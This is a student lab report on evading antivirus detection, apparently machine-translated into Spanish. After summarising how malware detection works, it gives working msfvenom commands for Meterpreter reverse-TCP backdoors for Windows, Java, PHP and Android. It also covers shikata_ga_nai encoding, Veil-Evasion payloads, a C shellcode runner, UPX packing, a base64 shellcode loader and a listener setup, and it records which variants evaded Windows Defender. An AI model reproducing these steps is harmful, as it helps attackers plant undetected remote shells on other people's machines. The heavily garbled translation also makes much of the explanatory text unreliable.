2019-2020-3 20175121 Bo "guerra de la red Tecnología" Exp3 libre de matar Principios y Práctica

Etiquetas: Linux, libre de matar

---

I. Resumen de mecanismos de detección de malware y tecnología matanza evitar (Evading AV)

1. mecanismo de detección de código malicioso

1,1 detección basada en firmas

• En el corto período de firma es una o más piezas de datos. Si un archivo ejecutable (o ejecutar otras bibliotecas, guiones, etc.) que contiene dichos datos sean considerados código malicioso.

1,2 detección de malware heurística

• Heurística heurística, en pocas palabras, es inferir en base a alguna característica de un solo lado. Por lo general, debido a la falta de base determinación exacta.
• "Cuando veo un pájaro que camina como un pato y nada como un pato y grazna como un pato, llamo a ese pájaro un pato." Sé que el Señor dijo a la detección de malware, es decir, si un software en el seco, generalmente, malware seca algo que se ve como el malware, entonces lo tomaron como un malware ella. El comportamiento típico como la conexión de un sitio malicioso Web, puertos abiertos, modificar los archivos del sistema, el "look and feel" típica como el archivo de la firma en sí, estructurales, los fabricantes y otras informaciones. Cada fabricante definirá su propio modo de detección.
• ventajas:
  • Es capaz de detectar programas maliciosos de día 0
  • Tiene un poco de versatilidad
• desventajas:
  • monitoreo del comportamiento del sistema, pasar un poco más de tiempo real
  • Sin basada en firmas de alta precisión

1.3 de detección de malware basada en el comportamiento

• Cuando inicialmente propuestos funciones de escaneo heurísticos son generalmente para los términos, significa universal de escaneado, no precisa características múltiples, se propone basada en el comportamiento posterior. En teoría, la detección basada en el comportamiento es el equivalente de una heurística, o es la inclusión de la vigilancia del comportamiento heurístico.

2. tecnología libre de sumario (Evading AV) matanza

Es software malicioso común, la tasa de detección AV general de 40% a 98%. Incluso si utiliza la mejor AV, el malware sigue siendo una probabilidad de 1/50 detectando.
técnicas generales son:

• cambio de firma
  • Si su mano solamente EXE
    • Packers: Compresión cubierta de la cáscara de cifrado
  • Hay código shell (como Meterpreter)
    • Codificados con codificación
    • de carga útil basada en el archivo ejecutable recompilado
  • El código fuente
    • Reescrito en otro idioma y luego compilado (velo-evasión)
• el cambio de comportamiento
  • comunicación
    • Trate de usar una conexión de rebote
    • Usar la tecnología de túnel
    • datos de las comunicaciones cifradas
  • Modo de operación
    • operación basada en RAM
    • Reducir la modificación del sistema de
    • Unirse a confundir el papel de la función normal del código
• Los métodos no convencionales
  • Mediante una aplicación vulnerable como una puerta trasera, como el código de ataque de escritura en el MSF.
  • Usar el ataque clase social, el objetivo de la truco de software AV.
  • Hechos a mano de un software malicioso

En segundo lugar, el contenido experimental

1. Uso de encoder correcto MSF, msfvenom genera otros archivos, como un frasco o similar, velo-evasión, su uso para matar libres conocimientos de programación o herramientas de código shell

1.1 codificador adecuado uso de MSF

Uso de MSF en el segundo experimento generó un programa de puerta trasera meter_backdoor.exe, a continuación, utilizar VirusTotal o VirScan ambos sitios para la exploración de puerta trasera generada

• Después de escanear con resultados VirusTotal son los siguientes:

• Después de escanear VirScan con los siguientes resultados:

Hasta que sin ningún tratamiento por la puerta trasera resultados VirusTotal exploración pueden ser detectados por la mayoría de muertes suave, se utiliza la siguiente puerta trasera codificador msf para codificar una pluralidad de veces, y la detección.

• Codificación de paso: -eSeleccione el codificador, -bes la necesidad de eliminar los caracteres de carga útil, con el fin de hacer que el comando \x00'no aparece código shell debido a código shell \x00'como terminador

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.26 LPORT=5215 -f exe > encoded1.exe

• Como se muestra:

• El uso de VirusTotal detectar Shellcode

• Ten codificado: Use -ipara ajustar el número de iteraciones

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.196.133 LPORT=5121 -f exe > encoded10.exe

• Como se muestra:

• El uso de VirusTotal detectar Shellcode

• Uso VirScan detección Shellcode

Solo visible para múltiples codificación para evitar la muerte no ayuda mucho, hay dos razones principales:

• shikata_ga_nai siempre tendrá que añadir la decodificación de parte del exe, la matanza suave acaba de encontrar esta parte, que es capaz de detectar código malicioso.
• msfvenom fijos totales plantilla para generar el archivo exe. Genera todo el archivo ejecutable, o si la plantilla de parámetros por defecto, hay ciertas características fijas, por lo que, en general, va a generar fabricantes antivirus detectan la firma utilizada para el MSF plantilla, de modo que podamos resolver todos msfvenom generar código malicioso.

2.1.2 msfvenom archivo JAR generado

• Generar Java puerta trasera:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.196.133 LPORT=5121 x> meter_backdoor_java.jar

• El uso de VirusTotal detectar archivo jar

2.1.3 mfsvenom generar archivos php

• Generar PHP puertas traseras uso

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.196.133 LPORT=5121 x> meter_backdoor.php

• El uso de VirusTotal detectar archivo PHP

• Uso VirScan detección Shellcode

php puerta trasera podrá eludir la mayoría de matanza suave suave lugar matanza bajo Windows 10 no hay reacción

archivo de generación Android 2.1.4 mfsvenom

• puerta trasera Android generación
  msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.196.133 lport=5121 x> Android_backdoor.apk

• El uso de VirusTotal archivo de detectar

• Uso VirScan archivo de detectar

generación 2. velo-evasión y de puerta trasera de detección

Referencia kali del velo-evasión para evitar matar el paquete de instalación no puede encontrar wine32 - Soluciones Pro-test y Kali Linux arquitectura de 64 bits para instalar Evasión velo , velo instalado con éxito

• Entrada de veilcomando para entrar en la página siguiente

• Introduzca el comando use evasionen el velo-evasión

• Introduzca el comando use c/meterpreter/rev_tcp.pypara entrar en la interfaz de configuración

• Conjunto rebote IP de conexión: set LHOST 192.168.196.133(aquí KaliIP), el puerto:set LPORT 5121

• comando de entrada generatearchivos generados, a continuación, el nombre de la carga útil de entrada tomados como: veil_c_5121Como se muestra en la figura, el archivo de lenguaje para generar el archivo de lenguaje C, el módulo de carga útil de tipo TCP rebote, sino el camino:/var/lib/veil/output/compiled/veil_c_5121.exe

• El uso de VirusTotal archivo de detectar

• Uso VirScan archivo de detectar

3. El uso de la programación de código shell

• Utilice el comando: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.196.133 LPORT=5121 -f cgenerar algo de código shell

• Crear un archivo 20175121.c, y luego shellcode está unsigned char buf[]asignado a la misma, el código es el siguiente:

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
........
........
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• Introduzca el comando i686-w64-mingw32-g++ 20175121.c -o 20175121.exe, compilar este archivo como un archivo ejecutable

• El uso de VirusTotal archivo de detectar

• Cuando lo pones en Windows es de Windows defener detectados

4. Herramientas de empacadores

• Los empacadores deben ser el nombre completo de la compresión de recursos del programa ejecutable, el programa comprimido se puede ejecutar directamente.

• Otro de los envasadores de manera común se implantan en un programa binario de un fragmento de código en el programa de control de acceso prioritario tiempo de ejecución, a continuación, después de que el nuevo el control al código original, con el propósito de hacerlo es ocultar el verdadero programa de la OEP (punto de entrada, para evitar el agrietamiento). La mayoría de los virus se basa en este principio.

• El programa requiere empacadores para evitar que un programa externo o software en el packer en sí recopilación, análisis o análisis dinámico, a fin de proteger la carcasa del programa original y el software no se destruye procedimientos externos para garantizar el funcionamiento normal del programa original.

• Esta técnica también se utiliza para los derechos de autor de software proteger, para evitar que el software de la grieta. Pero para el virus, empacadores pueden pasar por alto algunos software de análisis antivirus, lo que permite algunas de las características como parte de su invasión de virus o la destrucción.

• codificador MSF utilizando métodos similares, shellcode re-codificado.

-

Técnicamente dividido en bandejas parciales:

• Shell compresión
  • Reducir el volumen de aplicaciones, tales como ASPack, UPX
• cáscara de cifrado
  • La protección de copyright, anti-seguimiento. Como ASProtect, Armadillo
• virtual Machine
  • Compilado por medios similares, instrucciones de aplicación en el conjunto de instrucciones de su propio diseño. Como VMProtect, Themida

5. cáscara de compresión: UPX

• 20175121.exe más conchas antes de utilizar el comandoupx 20175121.exe -o yb.upxed.exe

• El uso de VirusTotal detectar archivos empaquetados

• Uso VirScan detectar archivos empaquetados

• Cuando se copia a la de Windows detectado por las ventanas defener

• Generada velo puerta de atrás veil_c_5121.execáscara, usando el comandoupx veil_c_5121.exe -o veil_c_shell5121.exe

• El uso de VirusTotal detectar archivos empaquetados

• Uso VirScan detectar archivos empaquetados

6. base64 + cifrado hex

Este método es el uso de k8: Python evitar la muerte de loader shellcode , herramientas k8 scrun no sólo proporciona código pitón de carga se puede cargar C #.

• Todos los documentos que se utilizan en el proceso de Baidu enlace disco de red , extraer el código: xlbf; Descargar
• C código shell genera un primer formato con msfvenom
  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.196.133 lport=5121 -f c -o shell.c

• cuchillo K8 se convertirá entonces en un código shell hexagonal

• El uso de VirusTotal detectar ScRunBase64.py

• Uso VirScan detección ScRunBase64.py

• Sin embargo, pasará a la de Windows o ser detectado próximo

7. código malicioso ejecutado por la combinación de la aplicación de diversas técnicas para evitar la matanza

Veil-Evasión utilizando una carga de otras maneras de generar puerta trasera

• velo de inicio, entró use evasionen la evasión, la entrada de listla carga útil Ver Disponible

• Elijo los primeros 31 cargas, se trata de un código shell base64 en el próximo Python

• Ingrese optionpara ver las opciones de carga útil

• En esta interfaz, podemos hacer alguna configuración básica de la carga útil, tales como archivos de formato compilado para generar válida, y si el cifrado
• Aquí sólo un poco de nombre de usuario de configuración set USERNAME yb, a continuación, introduzca generatela producción, de la siguiente manera
  • Después de que se le pedirá que desea seleccionar plataforma de código shell, seleccione 2-msfvenom, mientras recordamos relación con msfconsole.
  • Por defecto, introduzca un retorno de carro
  • Introduzca la carga Metasploit, ídem Enter
  • conexión de entrada Rebound IP (Linux el IP) y un número de puerto
  • Otra opción predeterminada msfvenom, introduzca

• Introduzca el nombre shellocode creado, aquí está veil_py_base64
• 2 Tipo de archivo generado, para generar un archivo EXE

• exe se ha generado setup.py, y runme.baten / var / lib / velo / salida / fuente / en
• Mientras que la nueva generación de archivo rc código shell también almacena en el directorio / var / lib / velo / salida / manipuladores /, abierto a ver, introducir el comando cat veil_py_base64.rc en msfconsole

• Uso VirusTotal detección setup.py y runme.bat

• Uso VirScan detección setup.py y runme.bat

• La matanza suave en su Windows no detecta

• La matanza suave en su Windows no detecta una entrada msfconsoleen la entrada de la consola de MSF use exploit/multi/handlermediante el módulo monitor, ajuste la carga útil
• MSF en línea normal, utilice el comando dir encontrar en este documento, ver, libre de matar el éxito

8. En el caso de la matanza abierta la caja, puede correr hacia atrás e incluso medido con éxito con otro equipo, especifique el nombre y la versión del equipo matanza suave

• Otro equipo se utiliza Windows 7, viene defener

En tercer lugar, las preguntas contestadas básicos

Cómo (1) suave matanza se detecta código malicioso?

• El software antivirus (AV) es una parte importante de la estrategia de seguridad más grande, se puede reducir la velocidad de propagación de programas maliciosos en Internet, la protección de los ejércitos.
• Biblioteca de características Ejemplo: En primer lugar, al haber tenido base de firmas de código malicioso, igualando su detección por firmas, si el partido tiene éxito, por la necesidad de proteger contra código malicioso.
• Por lo que algunas nuevo código malicioso que es más fácil pasar por alto la matanza suave, antes de ser detectado, puede haber algunos usuarios podrían estar infectados, es necesario actualizar la base de datos de firmas de malware.
• heurística de detección de malware: inferir alguna característica de un solo lado. Por lo general, debido a la falta de base determinación exacta.
• Comportamiento basado en la detección de malware: vigilar el comportamiento del código para ver si hay un acto malicioso hecho o están haciendo lo mismo con código malicioso, amenaza de seguridad para el anfitrión, es muy probable que el código malicioso.

(2) es libre de matar qué hacer?

• Por algún medio el código malicioso para que el software antivirus no puede matar, que es libre de matar.
• Clasificación para evitar la muerte de la tecnología
  para evitar la muerte de la tecnología se divide en archivos de matar a evitar, memoria libre para matar, la conducta libre de matar, empacadores libre de matar, más gastan libre de matar, modificar la firma evitar la muerte
• Packers libre de matar
  con el fin de prevenir anti-virus software de depuración traza matar y ser seguido, sino también para evitar programa de algoritmo de análisis estático por otros. Los ocultos más básicas: oculto archivos no son una forma visible +. Cáscara de la cáscara se divide en compresión y cifrado de la cáscara. vivienda empacador de compresión comprime generalmente, el tamaño del archivo comprimido es normalmente sólo el 50% -70% del original, pero no afecta el uso normal de todas las funciones y programas. Varios shell cifrado es pasar la tecnología anti-seguimiento no está protegido depuración de programas, los bombardeos, etc., el tamaño del volumen de los principales factores que no son tomados en la cáscara.
• Relleno libre de matar
  lo que es el código de basura? De hecho, puesto que de acuerdo con la orden "caos" podría ser más adecuado para entender,
  es instrucciones de máquina deliberadamente erróneas en la posición incorrecta, que cuando el desmontaje, es posible junto con los datos siguientes incorrectamente desmontarlo juntos, por lo vemos que podría ser un código de error desmontado. Este es el "código basura", en pocas palabras, es el uso de códigos de instrucciones de la máquina de desmontaje no deseado basado únicamente en los resultados desarme las palabras para determinar vulnerabilidades.
• Modificar la firma libre de matar,
  porque matar el software antivirus es la base de datos de firmas de virus y comparar su caballo de Troya, si es el mismo, entonces se determina que es un caballo de Troya, por supuesto, siempre y cuando nos deshacemos de estos códigos puede a fin de no matar. Se trata de un cambio en la firma para evitar la matanza.

(3) métodos básicos para evitar matar qué?

• Método a: modificar directamente el método de firma hexadecimal
  1. Método revisión: La firma correspondiente número hexadecimal en una diferencia o casi hexadecimal.
  2. Alcance: debe colocarse precisamente firma hexadecimal correspondiente, después de la modificación debe ser capaz de prueba
  si el uso normal.
• Método dos: modificar el método de cadena sensibles
  1. Método de revisión:. Firma correspondiente al contenido de la cadena, siempre y cuando el tamaño de la palabra puede ser intercambiado
  2. Aplicación: la firma correspondiente al contenido de carácter debe ser cuerdas, o no puede tener éxito.
• Método tres: método de sustitución equivalente
  1. Método revisión:. La sustitución de una clase funcional de instrucciones preparadas por la instrucción correspondiente a la orden en la firma ensamblador
  2. Aplicación: Una recopilación de instrucciones requeridas en la firma se puede sustituir tal como JN, JNE. en JMP, etc.
  Si, como yo, no entiendo puede ir a buscar el manual de compilación compilación 8080.
• Método cuatro: una orden de instrucciones transposición Método
  1. Método revisión: El patrón de secuencia de código de haber intercambiado.
  2. Aplicación: tiene ciertas limitaciones, para intercambiar el código no puede afectar a la ejecución normal del programa,
• Método cinco: Salto Método general
  1. Método de revisión:. Mover la firma cero región (consulte un vacío en el código), y luego un salto atrás se realiza JMP
  2. Alcance: no hay condiciones es un método común de cambio, sugieren fuertemente que usted domina la ley de reforma.

En cuarto lugar, la experiencia experimental

Antes de hacer experimentos, siempre me he sentido libre de matar para aquellos de nosotros nuevos en el enfrentamiento a la red novato es un tema muy lejana a su propio nivel y capacidad, es difícil ser libre de Troya para matar. A través de este experimento, entiendo algunos de los principios básicos de la matanza suave identificar el código malicioso, conocer el método para evitar matar en principio. Durante el experimento también se encontró con una variedad de problemas, tales como el principio de la instalación velo siempre hay algunos paquetes pueden no ahora, después de las investigaciones realizadas por la fuente de actualización para solucionar este problema. Así como en la producción de software de forma gratuita para matar matanza suave conmigo siempre se puede hacer de varias maneras el programa detecta que yo era muy escéptico si funciona el programa de derivación a la matanza suave, a través de varios intentos o definitiva una vez conseguido esto. Por supuesto, la libertad de matar a este corresponde conocimiento muy profundo que he hecho más que empezar, muchas cosas no se entienden, necesidad de seguir aprendiendo en este sentido.